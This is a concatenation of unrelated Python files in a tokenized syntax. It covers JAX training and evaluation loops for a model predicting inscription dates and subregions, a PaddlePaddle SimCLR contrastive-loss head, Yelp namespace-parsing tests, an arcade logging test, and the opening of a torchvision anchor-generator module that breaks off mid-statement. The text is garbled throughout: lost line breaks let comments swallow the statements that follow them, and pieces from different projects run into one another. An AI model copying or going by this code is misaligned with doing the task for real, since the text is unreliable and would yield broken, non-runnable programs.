<if_stmt>self.config.loss.date.enabled<block_start><if_stmt>self.config.loss.date.label_smoothing<g>0<block_start>date_dist_prob=jnp.exp(date_dist)# logprob to prob date_dist_prob_smooth=date_dist_prob<times>jax.random.uniform(rng shape=date_dist_prob.shape dtype=date_dist_prob.dtype minval=1-self.config.loss.date.label_smoothing maxval=1+self.config.loss.date.label_smoothing)<line_sep>date_dist_prob_smooth<augdiv>date_dist_prob_smooth.sum(axis=-1)[: jnp.newaxis]<line_sep>date_dist_prob_smooth=jnp.clip(date_dist_prob_smooth 1e-6 1)<line_sep>date_dist=jnp.log(date_dist_prob_smooth)<block_end>date_loss=0.<if_stmt>'l1'<in>self.config.loss.date.type.split('+')<block_start>date_pred_x=jnp.arange(self.config.dataset.date_min+self.config.dataset.date_interval/2 self.config.dataset.date_max+self.config.dataset.date_interval/2 self.config.dataset.date_interval).reshape(-1 1)<line_sep>date_pred_val=jnp.dot(jax.nn.softmax(date_pred axis=-1) date_pred_x)<line_sep>date_loss_l1_=jax.vmap(date_loss_l1)(date_pred_val date_min date_max date_available)<line_sep>jnp.nan_to_num(date_loss_l1_ copy=<false>)<line_sep>date_loss<augadd>(jnp.mean(date_loss_l1_ axis=0)<times>self.config.loss.date.weight_l1)<block_end><if_stmt>'dist'<in>self.config.loss.date.type.split('+')<block_start>date_loss_dist_=categorical_kl_divergence(date_dist date_pred)<line_sep>date_loss_dist_<augmul>date_available<line_sep>jnp.nan_to_num(date_loss_dist_ copy=<false>)<line_sep>date_loss<augadd>(jnp.mean(date_loss_dist_ axis=0)<times>self.config.loss.date.weight_dist)<block_end>date_loss<augmul>linear_weight(global_step self.config.loss.date.step_start self.config.loss.date.step_end)<block_end># Region and subregion loss <if_stmt>self.config.loss.region.enabled<block_start>subregion_loss=jnp.mean(cross_entropy_label_smoothing_loss(subregion_logits subregion label_smoothing=self.config.loss.region.label_smoothing) 0)<line_sep>jnp.nan_to_num(subregion_loss copy=<false>)<line_sep>subregion_loss<augmul>self.config.loss.region.weight<line_sep>subregion_accuracy=jnp.mean(jnp.argmax(subregion_logits -1)<eq>subregion)<line_sep>w=linear_weight(global_step self.config.loss.region.step_start self.config.loss.region.step_end)<line_sep>subregion_loss<augmul>w<block_end># Mask loss <if_stmt>self.config.loss.mask.enabled<block_start>mask_loss=jnp.sum(cross_entropy_label_smoothing_loss(mask_logits text_unmasked text_mask label_smoothing=self.config.loss.mask.label_smoothing) 1)<line_sep># [B] <assert_stmt>mask_loss.ndim<eq>1<line_sep>jnp.nan_to_num(mask_loss copy=<false>)<line_sep>mask_loss=jnp.mean(mask_loss 0)<times>self.config.loss.mask.weight# [] mask_all_accuracy=(jnp.argmax(mask_logits -1)<eq>text_unmasked).astype(mask_logits.dtype)<line_sep>mask_accuracy=jnp.divide(jnp.sum(jnp.multiply(mask_all_accuracy text_mask.astype(mask_logits.dtype))) jnp.sum(text_mask)+eps)<line_sep>mask_loss<augmul>linear_weight(global_step self.config.loss.mask.step_start self.config.loss.mask.step_end)<block_end># NSP loss <if_stmt>self.config.loss.nsp.enabled<block_start>nsp_loss=jnp.sum(jax.vmap(jax.vmap(cross_entropy_mask_loss))(nsp_logits next_sentence_label next_sentence_mask) 1)<line_sep># [B] <assert_stmt>nsp_loss.ndim<eq>1<line_sep>jnp.nan_to_num(nsp_loss copy=<false>)<line_sep>nsp_loss=jnp.mean(nsp_loss 0)<times>self.config.loss.nsp.weight<line_sep>nsp_all_accuracy=(jnp.argmax(nsp_logits -1)<eq>next_sentence_label).astype(nsp_logits.dtype)<line_sep>nsp_accuracy=jnp.divide(jnp.sum(jnp.multiply(nsp_all_accuracy next_sentence_mask.astype(nsp_logits.dtype))) jnp.sum(next_sentence_mask)+eps)<line_sep>nsp_loss<augmul>linear_weight(global_step self.config.loss.nsp.step_start self.config.loss.nsp.step_end)<block_end>loss=date_loss+subregion_loss+mask_loss+nsp_loss<line_sep>scaled_loss=loss/jax.device_count()<line_sep># NOTE: We use scaled_loss for grads and unscaled for logging. <return>scaled_loss (loss date_loss subregion_loss subregion_accuracy mask_loss mask_accuracy nsp_loss nsp_accuracy)<block_end><def_stmt>_update_func self params opt_state global_step batch rng<block_start>"""Applies an update to parameters and returns new state."""<line_sep># This function computes the gradient of the first output of loss_fn and # passes through the other arguments unchanged. grad_loss_fn=jax.grad(self._loss_fn has_aux=<true>)<line_sep>scaled_grads,(loss date_loss subregion_loss subregion_accuracy mask_loss mask_accuracy nsp_loss nsp_accuracy)=grad_loss_fn(params batch global_step rng)<line_sep>scaled_grads=jax.tree_map(jnp.nan_to_num scaled_grads)<line_sep>grads=jl_utils.tree_psum(scaled_grads axis_name='i')<line_sep># Compute and apply updates via our optimizer. learning_rate=self._learning_rate_fn(global_step)<line_sep>updates,opt_state=self._opt_update(grads opt_state params=params)<line_sep>params=optax.apply_updates(params updates)<line_sep># Scalars to log (note: we log the mean across all hosts/devices). scalars={'loss/train':loss 'loss/date':date_loss 'loss/subregion':subregion_loss 'loss/mask':mask_loss 'loss/nsp':nsp_loss 'accuracy/subregion':subregion_accuracy 'accuracy/mask':mask_accuracy 'accuracy/nsp':nsp_accuracy 'opt/learning_rate':learning_rate 'opt/grad_norm':optax.global_norm(grads) 'opt/param_norm':optax.global_norm(params) }<line_sep>scalars=jax.lax.pmean(scalars axis_name='i')<line_sep><return>params opt_state scalars<block_end># _ # _____ ____ _| | # / _ \ \ / / _` | | # | __/\ V / (_| | | # \___| \_/ \__,_|_| # <def_stmt>evaluate self global_step rng **unused_kwargs<block_start>"""See base class."""<if_stmt>self._eval_input<is><none><block_start>self._initialize_eval()<block_end>global_step=np.array(jl_utils.get_first(global_step))<line_sep>summary,outputs=self._eval_epoch(jl_utils.get_first(rng))<for_stmt>k,v summary.items()<block_start>summary[k]=np.array(v)<block_end>score=summary['score/eval']<line_sep>logging.info('[Step %d] eval_score=%.2f' global_step score)<line_sep># Log outputs checkpoint_dir=jl_utils.get_checkpoint_dir(FLAGS.config jax.process_index())<line_sep>outputs_path=os.path.join(checkpoint_dir 'best_outputs.pkl.bz2')<line_sep>score_path=os.path.join(checkpoint_dir 'best_score.txt')<line_sep>model_log_path=os.path.join(checkpoint_dir 'model_log')<line_sep>best_model_log_path=os.path.join(checkpoint_dir 'best_model_log')<line_sep># Check for preexisting outputs best_score=<none><line_sep>best_step=<none><if_stmt>os.path.exists(score_path)<block_start><with_stmt>open(score_path 'r')<as>f<block_start>tok=f.read().strip().split(' ')<line_sep>best_step=int(tok[0])<line_sep>best_score=float(tok[1])<block_end><block_end># Store outputs if score is better <if_stmt>best_score<is><none><or>(score<g>best_score<and>global_step<g>best_step)<block_start>best_score=score<with_stmt>open(score_path 'w')<as>f<block_start>f.write(f'{global_step} {best_score}')<block_end><with_stmt>open(outputs_path 'wb')<as>f<block_start>outputs_pkl=pickle.dumps(outputs protocol=2)<line_sep>outputs_pkl_bz2=bz2.compress(outputs_pkl)<line_sep>f.write(outputs_pkl_bz2)<block_end><if_stmt>self.config.evaluation.store_model_log<block_start><if_stmt>os.path.isdir(best_model_log_path)<block_start>map(os.remove glob.glob(best_model_log_path+'/*'))<block_end><else_stmt><block_start>os.makedirs(best_model_log_path)<block_end>distutils.dir_util.copy_tree(model_log_path best_model_log_path)<block_end>logging.info('[Step %d] Writing eval outputs: %s.' global_step outputs_path)<block_end># Log best score summary['score/eval_best']=best_score<line_sep><return>summary<block_end><def_stmt>_initialize_eval self<block_start>self._eval_input=jl_utils.py_prefetch(self._build_eval_input)<block_end><def_stmt>_build_eval_input self<block_start>"""Builds the evaluation input pipeline."""<line_sep>config_dataset=self.config.dataset<with_stmt>open(config_dataset.dataset_path)<as>dataset_file<block_start>ds=dataloader.loader_tf(self.config.evaluation.batch_size config_dataset self._region_map alphabet=self._alphabet dataset_file=dataset_file mode=self.config.evaluation.mode)<block_end><return>iter(tfds.as_numpy(ds))<block_end><def_stmt>_eval_batch self params batch rng<block_start>"""Evaluates a batch."""<line_sep>phi_id=batch['id']<line_sep>text_char=batch['text_char']<line_sep>text_word=batch['text_word']<line_sep>text_unmasked=batch['text_unmasked']<line_sep>text_mask=batch['text_mask']<line_sep>next_sentence_mask=batch['next_sentence_mask']<line_sep>next_sentence_label=batch['next_sentence_label']<line_sep>subregion=batch['region_sub_id']<line_sep>date_min=batch['date_min']<line_sep>date_max=batch['date_max']<line_sep>date_dist=batch['date_dist']<line_sep>date_available=batch['date_available']<line_sep># with hlogging.context() as log: (date_pred subregion_logits mask_logits nsp_logits)=self.forward.apply(params text_char=text_char text_word=text_word text_char_onehot=<none> text_word_onehot=<none> is_training=<false> rngs={'dropout':rng})<line_sep># Log model weights model_log={}<line_sep>subregion_loss=0.<line_sep>subregion_accuracy=0.<line_sep>date_loss=0.<line_sep>date_l1_loss=0.<line_sep>nsp_loss=0.<line_sep>nsp_accuracy=0.<line_sep># eps = 1e-6 date_count=0<line_sep>mask_count=0<line_sep>nsp_count=0<line_sep># Date loss <if_stmt>self.config.loss.date.enabled<block_start>date_pred_x=jnp.arange(self.config.dataset.date_min+self.config.dataset.date_interval/2 self.config.dataset.date_max+self.config.dataset.date_interval/2 self.config.dataset.date_interval).reshape(-1 1)<line_sep>date_pred_val=jnp.dot(jax.nn.softmax(date_pred axis=-1) date_pred_x)<line_sep>date_l1_loss=jnp.sum(jax.vmap(date_loss_l1)(date_pred_val date_min date_max date_available) axis=0)<if_stmt>'l1'<in>self.config.loss.date.type.split('+')<block_start>date_loss<augadd>date_l1_loss<times>self.config.loss.date.weight_l1<block_end><if_stmt>'dist'<in>self.config.loss.date.type.split('+')<block_start>date_loss_dist_=categorical_kl_divergence(date_dist date_pred)<line_sep>date_loss_dist_<augmul>date_available<line_sep>date_loss<augadd>(jnp.sum(date_loss_dist_ axis=0)<times>self.config.loss.date.weight_dist)<block_end>date_count=jnp.sum(date_available)<block_end># Region and subregion loss <if_stmt>self.config.loss.region.enabled<block_start>subregion_loss=jnp.sum(cross_entropy_loss(subregion_logits subregion) 0)<line_sep>subregion_loss<augmul>self.config.loss.region.weight<line_sep>subregion_accuracy=jnp.mean(jnp.argmax(subregion_logits -1)<eq>subregion)<block_end># Mask loss <if_stmt>self.config.loss.mask.enabled<block_start>mask_loss=jnp.sum(cross_entropy_label_smoothing_loss(mask_logits text_unmasked text_mask label_smoothing=0) 1)<line_sep># [B] # mask_loss /= jnp.sum(text_mask, axis=1) + eps # [B] <assert_stmt>mask_loss.ndim<eq>1<line_sep>mask_loss=jnp.mean(mask_loss 0)<times>self.config.loss.mask.weight# [] mask_all_accuracy=(jnp.argmax(mask_logits -1)<eq>text_unmasked).astype(mask_logits.dtype)<line_sep>mask_accuracy=jnp.sum(jnp.multiply(mask_all_accuracy text_mask.astype(mask_logits.dtype)))<line_sep>mask_count=jnp.sum(text_mask)<block_end># NSP loss <if_stmt>self.config.loss.nsp.enabled<block_start>nsp_loss=jnp.sum(jax.vmap(jax.vmap(cross_entropy_mask_loss))(nsp_logits next_sentence_label next_sentence_mask) 1)<line_sep># [B] <assert_stmt>nsp_loss.ndim<eq>1<line_sep>nsp_loss=jnp.sum(nsp_loss 0)<times>self.config.loss.nsp.weight<line_sep>nsp_all_accuracy=(jnp.argmax(nsp_logits -1)<eq>next_sentence_label).astype(nsp_logits.dtype)<line_sep>nsp_accuracy=jnp.sum(jnp.multiply(nsp_all_accuracy next_sentence_mask.astype(nsp_logits.dtype)))<line_sep>nsp_count=jnp.sum(next_sentence_mask)<block_end># Outputs scalars={'score/eval':(mask_accuracy+subregion_accuracy-date_l1_loss<times>0.01) 'loss/eval':mask_loss+date_loss+subregion_loss 'loss/date':date_loss 'loss/date_l1':date_l1_loss 'loss/subregion':subregion_loss 'loss/mask':mask_loss 'loss/nsp':nsp_loss 'count/date':date_count 'count/nsp':nsp_count 'count/mask':mask_count 'accuracy/subregion':subregion_accuracy 'accuracy/mask':mask_accuracy 'accuracy/nsp':nsp_accuracy }<line_sep>outputs={'outputs/id':phi_id 'outputs/date_pred':date_pred.astype('float16') 'outputs/date_min':date_min 'outputs/date_max':date_max 'outputs/date_dist':date_dist.astype('float16') 'outputs/date_available':date_available 'outputs/subregion_logits':subregion_logits.astype('float16') 'outputs/subregion':subregion }<line_sep><return>scalars outputs model_log<block_end><def_stmt>_eval_epoch self rng<block_start>"""Evaluates an epoch."""<line_sep>summary={}<line_sep>outputs={}<line_sep>total_num_sequences=0<line_sep># Prepare directories for storing model log checkpoint_dir=jl_utils.get_checkpoint_dir(FLAGS.config jax.process_index())<line_sep>model_log_path=os.path.join(checkpoint_dir 'model_log')<if_stmt>self.config.evaluation.store_model_log<block_start><if_stmt>os.path.isdir(model_log_path)<block_start>map(os.remove glob.glob(model_log_path+'/*'))<block_end><else_stmt><block_start>os.makedirs(model_log_path)<block_end><block_end># Checkpoints broadcast for each local device params=jl_utils.get_first(self._params)<line_sep># Model log buffer initialisation model_log_buffer=[]<def_stmt>_flush_model_log_buffer model_log_buffer<block_start>"""Writes model log to bz2 pickle files."""<while_stmt>model_log_buffer<block_start>model_log_batch_path,model_log_pkl_bz2=model_log_buffer.pop(0)<with_stmt>open(model_log_batch_path 'wb')<as>f<block_start>f.write(model_log_pkl_bz2)<block_end><block_end><block_end># Converting to numpy here allows us to reset the generator <for_stmt>batch self._eval_input()# Make sure that the input has batch_dim=1 <block_start><assert_stmt>batch['text_char'].shape[0]<eq>1<line_sep>summary_batch,outputs_batch,model_log_batch=self._eval_batch(params batch rng)<line_sep># Append batch values to dictionary <for_stmt>k,v summary_batch.items()<block_start>summary[k]=summary.get(k 0)+v<block_end><for_stmt>k,v outputs_batch.items()<block_start>outputs.setdefault(k []).append(v)<block_end>total_num_sequences<augadd>self.config.evaluation.batch_size<line_sep># Store model log per batch <if_stmt>self.config.evaluation.store_model_log# Append to buffer <block_start>model_log_batch_path=os.path.join(model_log_path str(outputs_batch['outputs/id'][0])+'.pkl.bz2')<line_sep>model_log_pkl=pickle.dumps(model_log_batch protocol=2)<line_sep>model_log_pkl_bz2=bz2.compress(model_log_pkl)<line_sep>model_log_buffer<augadd>[(model_log_batch_path model_log_pkl_bz2)]<line_sep># Flush model log buffer <if_stmt>(len(model_log_buffer)%self.config.evaluation.store_model_log_steps<eq>0)<block_start>_flush_model_log_buffer(model_log_buffer)<block_end><block_end><block_end># Flush remaining model log buffer <if_stmt>self.config.evaluation.store_model_log<block_start>_flush_model_log_buffer(model_log_buffer)<block_end># Normalise and concatenate summary['loss/date']<augdiv>summary['count/date']<line_sep>summary['loss/date_l1']<augdiv>summary['count/date']<line_sep>summary['loss/mask']<augdiv>summary['count/mask']<line_sep>summary['accuracy/mask']<augdiv>summary['count/mask']<line_sep>summary['loss/nsp']<augdiv>summary['count/nsp']<line_sep>summary['accuracy/nsp']<augdiv>summary['count/nsp']<line_sep>summary['loss/subregion']<augdiv>total_num_sequences<line_sep>summary['accuracy/subregion']<augdiv>total_num_sequences<line_sep>summary['score/eval']=(summary['accuracy/mask']+summary['accuracy/subregion']-summary['loss/date_l1']<times>0.01)<line_sep>summary['loss/eval']=(summary['loss/mask']+summary['loss/date']+summary['loss/subregion'])<for_stmt>k,v outputs.items()<block_start>outputs[k]=np.concatenate(v axis=0)<block_end><return>summary outputs<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>flags.mark_flag_as_required('config')<line_sep>app.run(functools.partial(platform.main Experiment))<block_end>
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_stmt>paddle<import_stmt>paddle.nn<as>nn<import_from_stmt>.builder HEADS<import_stmt>paddle.nn.functional<as>F<import_stmt>paddle.fluid.layers<as>layers<line_sep>LARGE_NUM=1e9<line_sep>@HEADS.register()<class_stmt>SimCLRContrastiveHead(nn.Layer)<block_start>"""Head for contrastive learning. Args: temperature (float): The temperature hyper-parameter that controls the concentration level of the distribution. Default: 0.1. """<def_stmt>__init__ self temperature=0.5 return_accuracy=<true> multi_rank=<false><block_start>super(SimCLRContrastiveHead self).__init__()<line_sep>self.criterion=nn.CrossEntropyLoss()<line_sep>self.temperature=temperature<line_sep>self.return_accuracy=return_accuracy<line_sep>self.multi_rank=multi_rank<block_end><def_stmt>forward self pos neg<block_start>"""Forward head. Args: pos (Tensor): Nx1 positive similarity. neg (Tensor): Nxk negative similarity. Returns: dict[str, Tensor]: A dictionary of loss components. """<line_sep>hidden1,hidden2=pos neg<line_sep>batch_size=pos.shape[0]<line_sep># Gather hidden1/hidden2 across replicas and create local labels. <if_stmt>self.multi_rank<is><true><block_start>hidden1_large=self.add_allgather(hidden1 "hidden1"+str(self.co2))<line_sep>hidden2_large=self.add_allgather(hidden2 "hidden2"+str(self.co2))<line_sep>hidden1_large=paddle.reshape(hidden1_large [-1 hidden1_large.shape[-1]])<line_sep>hidden2_large=paddle.reshape(hidden2_large [-1 hidden2_large.shape[-1]])<line_sep>enlarged_batch_size=paddle.shape(hidden1_large)[0]<line_sep>trainer_id=self.args.trainer_id<line_sep>labels_idx=paddle.arange(0 batch_size 1 "int32")+trainer_id<times>batch_size<line_sep>labels=F.one_hot(paddle.reshape(labels_idx [batch_size]) enlarged_batch_size<times>2)<line_sep>masks=F.one_hot(paddle.reshape(labels_idx [batch_size]) enlarged_batch_size)<block_end><else_stmt><block_start>hidden1_large=hidden1<line_sep>hidden2_large=hidden2<line_sep>labels=F.one_hot(paddle.reshape(paddle.arange(0 batch_size 1 "int32") [batch_size]) batch_size<times>2)<line_sep>masks=F.one_hot(paddle.reshape(paddle.arange(0 batch_size 1 "int32") [batch_size]) batch_size)<block_end>logits_aa=paddle.matmul(hidden1 hidden1_large transpose_y=<true>)/self.temperature<line_sep>logits_aa=logits_aa-masks<times>LARGE_NUM<line_sep>logits_bb=paddle.matmul(hidden2 hidden2_large transpose_y=<true>)/self.temperature<line_sep>logits_bb=logits_bb-masks<times>LARGE_NUM<line_sep>logits_ab=paddle.matmul(hidden1 hidden2_large transpose_y=<true>)/self.temperature<line_sep>logits_ba=paddle.matmul(hidden2 hidden1_large transpose_y=<true>)/self.temperature<line_sep>loss_a=paddle.nn.functional.softmax_with_cross_entropy(paddle.concat([logits_ab logits_aa] 1) labels soft_label=<true>)<line_sep>loss_b=paddle.nn.functional.softmax_with_cross_entropy(paddle.concat([logits_ba logits_bb] 1) labels soft_label=<true>)<line_sep>contrast_loss=loss_a+loss_b<line_sep>logits_ab_co2=logits_ab-masks<times>LARGE_NUM<line_sep>logits_ba_co2=logits_ba-masks<times>LARGE_NUM<line_sep>logit_a=paddle.concat([logits_aa logits_ab_co2] 1)<line_sep>logit_b=paddle.concat([logits_ba_co2 logits_bb] 1)<line_sep>log_a=paddle.nn.functional.log_softmax(logit_a)<line_sep>log_b=paddle.nn.functional.log_softmax(logit_b)<line_sep>a=paddle.nn.functional.softmax(logit_a)<line_sep>b=paddle.nn.functional.softmax(logit_b)<line_sep>kl_1=paddle.nn.functional.kl_div(log_a b reduction='batchmean')<line_sep>kl_2=paddle.nn.functional.kl_div(log_b a reduction='batchmean')<line_sep>co2_loss=1<times>(kl_1+kl_2)<line_sep>total_contrast_loss=contrast_loss+3<times>co2_loss<line_sep>loss=layers.reduce_mean(total_contrast_loss)<line_sep>contrastive_label=paddle.unsqueeze(paddle.argmax(labels axis=1) 1)<line_sep>acc1=layers.accuracy(input=logits_ab label=contrastive_label)<line_sep>outputs=dict()<line_sep>outputs['loss']=loss<line_sep>outputs['acc1']=acc1<line_sep><return>outputs<block_end><block_end><def_stmt>accuracy output target topk=(1 )<block_start>"""Computes the accuracy over the k top predictions for the specified values of k"""<with_stmt>paddle.no_grad()<block_start>maxk=max(topk)<line_sep>batch_size=target.shape[0]<line_sep>_,pred=output.topk(maxk 1 <true> <true>)<line_sep>pred=pred.t()<line_sep>correct=paddle.cast(pred<eq>target.reshape([1 -1]).expand_as(pred) 'float32')<line_sep>res=[]<for_stmt>k topk<block_start>correct_k=correct[:k].reshape([-1]).sum(0 keepdim=<true>)<line_sep>res.append(correct_k<times>100.0/batch_size)<block_end><return>res<block_end><block_end><def_stmt>add_allgather self hidden name=""<block_start>block=self._train_program.global_block()<line_sep>hidden_large=block.create_var(name=name shape=[self.args.trainer_num]+list(hidden.shape) persistable=<false> dtype=core.VarDesc.VarType.FP32)<line_sep>op_len=len(list(enumerate(block.ops)))<line_sep>op_maker=core.op_proto_and_checker_maker<line_sep>self.op_role_key=op_maker.kOpRoleAttrName()<line_sep>block._insert_op(op_len type='c_allgather' inputs={'X':hidden} outputs={'Out':hidden_large} attrs={'nranks':self.args.trainer_num self.op_role_key:OpRole.Forward "use_calc_stream":<true>})<line_sep><return>hidden_large<block_end>
# -*- coding: utf-8 -*- # Copyright 2016 Yelp Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. <import_from_future_stmt> absolute_import<import_from_future_stmt> unicode_literals<import_stmt>pytest<import_from_stmt>data_pipeline._namespace_util DBSourcedNamespace<class_stmt>TestDBSourcedtNamespace(object)<block_start><def_stmt>test_simple self<block_start>name="refresh_primary.yelp"<line_sep>self._assert_success(actual_namespace=DBSourcedNamespace.create_from_namespace_name(name) expected_name=name expected_cluster="refresh_primary" expected_database="yelp")<block_end><def_stmt>test_main_cluster self<block_start>name="main.database"<line_sep>self._assert_success(actual_namespace=DBSourcedNamespace.create_from_namespace_name(name) expected_name=name expected_cluster="main" expected_database="database")<block_end><def_stmt>test_environment self<block_start>name="main.refresh_primary.yelp"<line_sep>self._assert_success(actual_namespace=DBSourcedNamespace.create_from_namespace_name(name) expected_name=name expected_cluster="refresh_primary" expected_database="yelp" expected_environment="main")<block_end><def_stmt>test_tranformers self<block_start>name="dev.refresh_primary.yelp.heartbeat.yelp-main_transformed"<line_sep>self._assert_success(actual_namespace=DBSourcedNamespace.create_from_namespace_name(name) expected_name=name expected_cluster="refresh_primary" expected_database="yelp" expected_environment="dev" expected_suffixes=["heartbeat" "yelp-main_transformed"])<block_end><def_stmt>test_fail_missing self<block_start>self._assert_failure("yelp" error_substr="not enough sections")<line_sep>self._assert_failure("refresh_primary" error_substr="not enough sections")<block_end><def_stmt>test_fail_invalid_chars self<block_start>self._assert_failure("^refresh_primary.yelp" error_substr="must contain at least")<line_sep>self._assert_failure("fadjskl;.fjd" error_substr="must contain at least")<line_sep>self._assert_failure("______.______" error_substr="must contain at least")<line_sep>self._assert_failure("refresh_primary..yelp" error_substr="must contain at least")<block_end><def_stmt>test_guarantees self<block_start>name="main.database.transformer"<line_sep>self._assert_success(actual_namespace=DBSourcedNamespace.create_from_namespace_name_with_guarantees(name expected_cluster="main") expected_name=name expected_cluster="main" expected_database="database" expected_suffixes=["transformer"])<block_end><def_stmt>test_guarantees_db self<block_start>name="main.database.transformer"<line_sep>self._assert_success(actual_namespace=DBSourcedNamespace.create_from_namespace_name_with_guarantees(name expected_database="database") expected_name=name expected_cluster="main" expected_database="database" expected_suffixes=["transformer"])<block_end><def_stmt>test_guarantees_transformer self<block_start>name="main.database.transformer"<line_sep>self._assert_success(actual_namespace=DBSourcedNamespace.create_from_namespace_name_with_guarantees(name expected_suffixes=["transformer"]) expected_name=name expected_cluster="main" expected_database="database" expected_suffixes=["transformer"])<block_end><def_stmt>test_guarantees_environment self<block_start>name="env.cluster.database"<line_sep>self._assert_success(actual_namespace=DBSourcedNamespace.create_from_namespace_name_with_guarantees(name expected_environment="env") expected_name=name expected_environment="env" expected_cluster="cluster" expected_database="database")<block_end><def_stmt>test_fail_impossible self<block_start>name="dev.refresh_primary.yelp.transformer"<line_sep>self._assert_failure_with_guarantees(name expected_environment="main")<block_end><def_stmt>test_fail_impossible_suffixes self<block_start>name="dev.refresh_primary.yelp.transformer"<line_sep>self._assert_failure_with_guarantees(name expected_suffixes=["heartbeat"])<block_end><def_stmt>test_fail_impossible_double_cluster_env self<block_start>name="dev.refresh_primary.yelp.transformer"<line_sep>self._assert_failure_with_guarantees(name expected_environment="dev" expected_cluster="dev")<block_end><def_stmt>test_fail_impossible_env_db self<block_start>name="dev.refresh_primary.yelp.transformer"<line_sep>self._assert_failure_with_guarantees(name expected_environment="dev" expected_database="refresh_primary")<block_end><def_stmt>test_no_name self<block_start>self._assert_success(actual_namespace=DBSourcedNamespace(environment="main" cluster="refresh_primary" database="yelp") expected_name="main.refresh_primary.yelp" expected_environment="main" expected_cluster="refresh_primary" expected_database="yelp")<block_end><def_stmt>test_no_name_no_env self<block_start>self._assert_success(actual_namespace=DBSourcedNamespace(cluster="refresh_primary" database="yelp" suffixes=["heartbeat"]) expected_name="refresh_primary.yelp.heartbeat" expected_cluster="refresh_primary" expected_database="yelp" expected_suffixes=["heartbeat"])<block_end><def_stmt>_assert_failure self name error_substr<block_start><with_stmt>pytest.raises(ValueError)<as>e<block_start>DBSourcedNamespace.create_from_namespace_name(name)<assert_stmt>error_substr<in>e<block_end><block_end><def_stmt>_assert_failure_with_guarantees self name expected_cluster=<none> expected_database=<none> expected_environment=<none> expected_suffixes=<none><block_start><with_stmt>pytest.raises(ValueError)<as>e<block_start>DBSourcedNamespace.create_from_namespace_name_with_guarantees(name expected_environment=expected_environment expected_cluster=expected_cluster expected_database=expected_database expected_suffixes=expected_suffixes)<assert_stmt>"impossible to rectify"<in>e<block_end><block_end><def_stmt>_assert_success self actual_namespace expected_name expected_cluster expected_database expected_environment=<none> expected_suffixes=<none><block_start><if_stmt><not>expected_suffixes<block_start>expected_suffixes=[]<block_end><assert_stmt>actual_namespace.get_name()<eq>expected_name<assert_stmt>actual_namespace.cluster<eq>expected_cluster<assert_stmt>actual_namespace.database<eq>expected_database<assert_stmt>actual_namespace.environment<eq>expected_environment<assert_stmt>actual_namespace.suffixes<eq>expected_suffixes<block_end><block_end>
<import_stmt>logging<import_stmt>arcade<def_stmt>test_logging <block_start>arcade.configure_logging(logging.WARNING)<line_sep>logger=logging.getLogger('arcade')<assert_stmt>logger.level<eq>logging.WARNING<block_end>
""" Parts of this code are from torchvision and thus licensed under BSD 3-Clause License Copyright (c) <NAME> 2016, All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """<import_stmt>torch<import_from_stmt>typing Callable Sequence List Tuple TypeVar Union<import_from_stmt>torchvision.models.detection.rpn AnchorGenerator<import_from_stmt>loguru logger<import_from_stmt>itertools product<line_sep>AnchorGeneratorType=TypeVar('AnchorGeneratorType' bound=AnchorGenerator)<def_stmt>get_anchor_generator dim:int s_param:bool=<false><arrow>AnchorGenerator<block_start>""" Get anchor generator class for corresponding dimension Args: dim: number of spatial dimensions s_param: enable size parametrization Returns: Callable: class of anchor generator """<line_sep>normal={2:AnchorGenerator2D 3:AnchorGenerator3D}<line_sep>sparam={2:AnchorGenerator2DS 3:AnchorGenerator3DS}<if_stmt>s_param<block_start><return>sparam[dim]<block_end><else_stmt><block_start><return>normal[dim]<block_end><block_end><def_stmt>compute_anchors_for_strides anchors:torch.Tensor strides:Sequence[Union[Sequence[Union[int float]] Union[int float]]] cat:bool<arrow>Union[List[torch.Tensor] torch.Tensor]<block_start>""" Compute anchors sizes which follow a given sequence of strides Args: anchors: anchors for stride 0 strides: sequence of strides to adjust anchors for cat: concatenate resulting anchors, if false a Sequence of Anchors is returned Returns: Union[List[torch.Tensor], torch.Tensor]: new anchors """<line_sep>anchors_with_stride=[anchors]<line_sep>dim=anchors.shape[1]<floordiv>2<for_stmt>stride strides<block_start><if_stmt>isinstance(stride (int float))<block_start>stride=[stride]<times>dim<block_end>stride_formatted=[stride[0] stride[1] stride[0] stride[1]]<if_stmt>dim<eq>3<block_start>stride_formatted.extend([stride[2] stride[2]])<block_end>anchors_with_stride.append(anchors<times>torch.tensor(stride_formatted)[<none>].float())<block_end><if_stmt>cat<block_start>anchors_with_stride=torch.cat(anchors_with_stride 